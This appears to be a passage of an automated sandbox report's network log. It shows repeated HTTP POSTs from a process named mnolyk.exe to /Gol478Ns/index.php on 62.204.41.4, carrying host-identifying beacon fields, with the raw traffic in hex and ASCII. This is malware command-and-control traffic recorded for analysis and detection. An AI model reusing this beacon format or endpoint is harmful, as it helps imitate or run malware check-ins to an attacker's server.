                                                                      Date: Tue, 07 Feb 2023 22:08:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      246192.168.2.74994162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:07.714680910 CET361OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:07.778090000 CET361INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      247192.168.2.74994262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:07.961390018 CET362OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:08.025127888 CET362INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      248192.168.2.74994362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:08.214342117 CET363OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:08.279133081 CET363INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      249192.168.2.74994462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:08.460140944 CET364OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:08.525207043 CET364INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      25192.168.2.74971962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:07.624988079 CET129OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:07.686675072 CET129INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      250192.168.2.74994562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:08.700274944 CET365OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:08.764461040 CET365INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      251192.168.2.74994662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:08.944668055 CET366OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:09.008547068 CET366INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      252192.168.2.74994762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:09.176994085 CET367OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:09.240406036 CET367INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      253192.168.2.74994862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:09.418494940 CET368OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:09.483279943 CET368INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      254192.168.2.74994962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:09.663717985 CET369OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:09.727545977 CET369INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      255192.168.2.74995062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:09.942678928 CET370OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:10.006781101 CET370INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      256192.168.2.74995162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:10.180583954 CET371OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:10.243530989 CET371INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      257192.168.2.74995262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:10.427882910 CET372OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:10.490973949 CET372INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      258192.168.2.74995362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:10.664702892 CET373OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:10.728537083 CET373INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      259192.168.2.74995462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:10.899375916 CET374OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:10.962054968 CET374INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      26192.168.2.74972062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:07.869854927 CET130OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:07.934511900 CET130INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      260192.168.2.74995562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:11.133835077 CET375OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:11.200885057 CET375INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      261192.168.2.74995662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:11.390676975 CET376OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:11.454973936 CET376INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      262192.168.2.74995762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:11.632559061 CET377OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:11.696100950 CET377INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      263192.168.2.74995862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:11.883806944 CET378OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
